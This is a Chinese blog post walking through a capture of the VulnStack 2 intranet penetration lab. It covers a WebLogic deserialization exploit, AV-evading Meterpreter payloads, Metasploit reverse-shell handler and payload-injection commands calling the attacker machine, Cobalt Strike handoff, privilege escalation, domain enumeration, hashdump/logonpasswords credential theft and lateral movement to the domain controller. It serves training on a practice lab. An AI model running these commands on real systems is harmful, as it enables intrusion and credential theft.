内网渗透靶机-VulnStack 2

最新推荐文章于 2024-04-21 17:24:19 发布
最新推荐文章于 2024-04-21 17:24:19 发布
阅读量4.7k 收藏 6
点赞数 1
分类专栏: 内网渗透 文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44368248/article/details/123042268
版权

目录

内网渗透靶机-VulnStack 2

主机发现

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

内网信息收集

ipconfig /all

Tasklist

shell net group "domain users" /domain

shell net group “domain admins” /domain

shell net group “domain computers” /domain

shell net group “domain controllers” /domain

shell net time /domain

shell nslookup DC.de1ay.com

抓取WEB主机的密码

内网横向

内网渗透靶机-VulnStack 2

主机发现

发现存在192.168.111.128、192.168.111.201两台目标主机,192.168.111.130为kali攻击机

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

445端口存在永恒之蓝漏洞,可能存在杀毒软件所以无法利用

192.168.111.128 7001端口存在反序列化漏洞

上传马

在kali上执行如下命令:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.111.130; set lport 4444; run; "

使用掩日2.1生成msf免杀马,使用冰鞋上传并且执行

Msf成功上线

msf上线cs

msf使用注入模块 + cs创建Listener监听 (相同payload)

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost (cs listener ip)

set lport (cs listener port)

set session (id)

Run

CS成功上线

使用ms14-058提权

内网信息收集

ipconfig /all

存在域de1ay.com

两个网卡,ip分别为192.168.111.128、10.10.10.80

Tasklist

查看进程,存在360杀毒

shell net group "domain users" /domain

查看域用户,存在用户Administrator、de1ay、krbtgt、mssql

shell net group “domain admins” /domain

查看域管理员账号,域管理员账号为Administrator

shell net group “domain computers” /domain

查看域中的机器,除了域控之外还有WEB和PC两台机器

shell net group “domain controllers” /domain

查看域控制器

shell net time /domain

查询域控主机名

shell nslookup DC.de1ay.com

查询域控对应的ip

内网另外一台机器的ip为

抓取WEB主机的密码

hashdump
logonpasswords

内网横向

尝试使用cs横向

首先建立一个smb监听

利用上面爬取到的密码进行横向

成功拿到域控的权限

按照上面的方法,同样拿下PC机器

成果如图所示:

大白杀仙
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【红日靶场】vulnstack2-完整渗透过程
信安是不可或缺的一部分!
09-28 1038
可以通过多种方式进行渗透测试这里只是我自己喜欢的方式,内网还能抓取hash等利用,在后面的红日靶场系列中会使用。
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3677
红队靶场内网渗透(从DMZ主机渗透到域内机器)
内网渗透系列-真实内网环境搭建
最新发布
lza20001103的博客
04-21 1002
内网渗透系列-真实内网环境搭建
渗透测试vulnstack2-渗透思路养成!
m0_74272345的博客
10-01 280
花了一个下午到晚上十点的时间,尽量不借助WP试着打了一次(但还是略看了一点),目的是想形成自己的方法论和渗透思路。但很明显思路还不成熟,不够熟练。这是第二次打vulnstack2,上次还是6月份的时候,这次选择了纯MSF打法,仍然暴露出MSF的一些局限性,还是要配合CS来打本次未完成的两个问题横向移动到PC黄金票据生成(上次纯CS打法是解决了这个问题的)
红日靶机vulnstack02【精华总结】
qq_45300786的博客
07-25 1349
前记 听说红日靶机是非常好的内网渗透练习靶机,那么今天就来玩玩。 我会把我学到的全都记录下来,方便以后复习,所以可能有点多,需要的自己看目录。 这里我会先说明思路(环境思路和战斗思路)和总结 红日靶机vulnstack02主机配置比红日靶机vulnstack01【精华总结】多了2点,2台域成员主机的UAC认证和域控的密码复杂度。这2个记得都改了,不然很烦。 这里非常重要的一点,楼主必须先科普一下! 1、域控机可管理所有域用户。 2、域用户、域管理员可登陆到任何一台在域中的域成员主机,当然域成员想要登陆域控机
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 1955
内网代理技术拿下某CTF三层靶机渗透
记录某靶场内网渗透过程
黑战士的博客
04-01 845
菜刀连接日志解析的一句话木马,使用Cobalts Strike生成可执行文件上传到网站目录,菜刀进行执行命令语句,上线CS,之后开始内网渗透。口头语言解释:外网中的A主机与B主机相通且已控制B,B主机可以与内网中的C主机(无法连接公网)相通,但是A主机与C主机不相通,此时就需要在B主机上利用SMB beacon使A和C相通,进而使A主机控制C主机。*接下来目的是横向渗透使用这个Win7作为跳板,拿下内网域内的域成员主机和域控主机,首先使用CS和MSF联动查到开放455端口,打了个永恒之蓝发现失败。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
攻防靶场|Vulnstack2靶场之CS实战
weixin_42282189的博客
11-19 4149
作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 最近学点攻防,拿靶场练练手,大佬轻喷哈。 靶场简介: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。 Bypass UAC Wind.
【VulHub靶场】之CFS三层靶机内网渗透
weixin_51519028的博客
10-21 1627
msf配置代理的实操
ATT&CK 实战 - 红日安全 vulnstack(二)渗透记录
daxi0ng的博客
11-30 2272
前言: 搭建过程可以参考这位师傅的。我就不重复写了。 https://www.cnblogs.com/sallyzhang/p/13889411.html 三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。 默认没有开启Web服务,来到C:\Oracle\Middleware\user_projects\domains\base_domain 路径,运行startWebLogic.
[VulnStack] ATT&CK实战系列—红队实战(二)
weixin_45605352的博客
08-27 1083
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.
渗透测试环境靶机汇总
qq_35258210的博客
01-11 2199
链接来源于网络,如有侵权请告知删除。 phpstudy:https://www.xp.cn/ pikachu:https://github.com/zhuifengshaonianhanlu/pikachu sqli-labs:https://github.com/Audi-1/sqli-labs xss-laba:https://github.com/do0dl3/xss-labs 待续。。。 ...
渗透测试之Homeless靶机实战
大方子
11-21 2372
前言 本次靶机难度中等,还是长了很多见识,值得学习 环境准备 下载Homeless靶机:https://download.vulnhub.com/homeless/Homeless.zip 这里我用 virtual box 打开 主机:kali linux 192.168.100.8 靶机 : Homeless靶机 辅助:windows 192.168.100.9 目标:拿下靶机r...
在学校机房进行的一次内网渗透(DNS欺骗)
热门推荐
PigVillage_Terry
11-01 1万+
上个星期的课上林老板讲到了很多年前的钓鱼网站原理,今天心血来潮突然想试试,就没有好好听课了哈哈哈哈。(求林老板别挂我科) 小白一只,求大牛们勿喷,有不对的地方请帮忙指正。 一、系统环境 Kali Linux 2.0 (前身是Backtrack系列):著名的渗透测试系统,集成了很多专业的渗透工具 Ettercap 0.8.2 :一款强大的网络嗅探工具,可以进行ARP欺骗,
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值